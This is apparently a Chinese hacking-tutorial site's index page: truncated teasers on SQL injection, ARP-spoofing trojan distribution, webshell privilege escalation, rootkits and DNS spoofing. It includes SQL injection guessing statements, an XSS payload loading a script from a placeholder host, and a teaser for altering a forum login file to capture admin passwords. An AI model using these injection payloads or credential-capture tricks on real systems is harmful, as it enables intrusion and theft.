破解数据库下载漏洞

作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你
收藏 0 赞 0 分享

看黑客怎样汇编创建简单的窗口

理论: Windows 程序中,在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处,对于用户,面对的是同一套标准的窗口,对这些窗口的操作都是一样的,所以使用不同的应用程序时无须重新学习操作。对程序员来说,这些 Gui 源代码
收藏 0 赞 0 分享

新的挂马方式-ARP欺骗

网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。   局域网ARP欺骗挂马的好处
收藏 0 赞 0 分享

教你如何手工注入猜解语句

猜解表名: and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法: 联合查询: select name,password,id from user union s
收藏 0 赞 0 分享

扫不出肉鸡的常见原因

扫不出肉鸡有很多的可能!一般有如下的情况!   1.你系统的防火墙,或某些补丁作怪!   2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道)   3.机子设置有关!   4.扫描的网段没有肉鸡(空IPC的2000机子,其实现在已比较少的了)  
收藏 0 赞 0 分享

许多高手提升权限技巧

当我们取得一个webshell时候,下一部要做的就是提升权限   个人总结如下:   1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳转到这个目录,如果行那就
收藏 0 赞 0 分享

教你两句话 动网8.20的后台被拿下

dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function D
收藏 0 赞 0 分享

黑客技巧:利用Log备份获取Webshell

dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能
收藏 0 赞 0 分享

教你如何用ISAPI_Rewrite做IIS防盗链

“盗链”的定义是:此内容不在自己服务器上,而通过技术手段,绕过别人放广告有利益的最终页,直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站的地址(比如一些音乐、图片、软件的下载地址)然后放置在自
收藏 0 赞 0 分享

浅谈文件捆绑技术方式(图)

随着恶意代码的发展越来越广泛,以及其强大的破坏性和更多样的传播方式,给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意代码的传播方式之一的捆绑技术,以及常见的Winrar自解压
收藏 0 赞 0 分享

Unicode的消息介绍(图)

基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之前,首先要讲解一些基
收藏 0 赞 0 分享

Rootkit隐形技术教程(图)

一、综述 本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。同时,为了让读者获得rootkit编程的相关经验,我们顺便介绍了rootkit的装载、卸载方法,以及必不可少的测试技术。 本文介绍的Root
收藏 0 赞 0 分享

用ASP脚本命令重启服务器

家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然后按照不同的重启和关机方式进行操作! 下面先说COM的制作,在VB中新建一工程,当然是AceiveX dll的! 1)先修改工程属
收藏 0 赞 0 分享

后门程序技术知识深解

后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。   后门是一种登录系统的方法,它不仅绕过系统已有的安
收藏 0 赞 0 分享

DNS欺骗技术教程

定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的&ldqu
收藏 0 赞 0 分享

教你如何在XSS中再插JS

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}&q
收藏 0 赞 0 分享

黑客域名劫持攻击的基本步骤

近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击,但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法,攻击者使用的是一种域名劫持攻击?攻击者通过冒充原域名拥有者以E-MAIL方式修改网络解决方案公司的注册
收藏 0 赞 0 分享

黑客狙击Oracle系统的八大常用方法

Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够找到攻击它的方法,Oracle也不例外。本文将和大家从黑客的角度讨论黑客是用哪些方法把黑手伸向了你原以为他们不能触及的数据,希
收藏 0 赞 0 分享

教你关于AJAX的注入(图)

AJAX可以让数据在后台无声无息地进行,假如有办法让你的JS脚本与这个AJAX模块在同域内的话,那可以使用这个XSS来完成二次攻击,并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX,直接构造URL里的参数值;POST型的AJAX,则构造好XHR
收藏 0 赞 0 分享

教你用PHPWIND得到管理员密码的方法

有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办? 在登录文件做手脚啊...我来贴一个我修改的. login.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE: if($action==&qu
收藏 0 赞 0 分享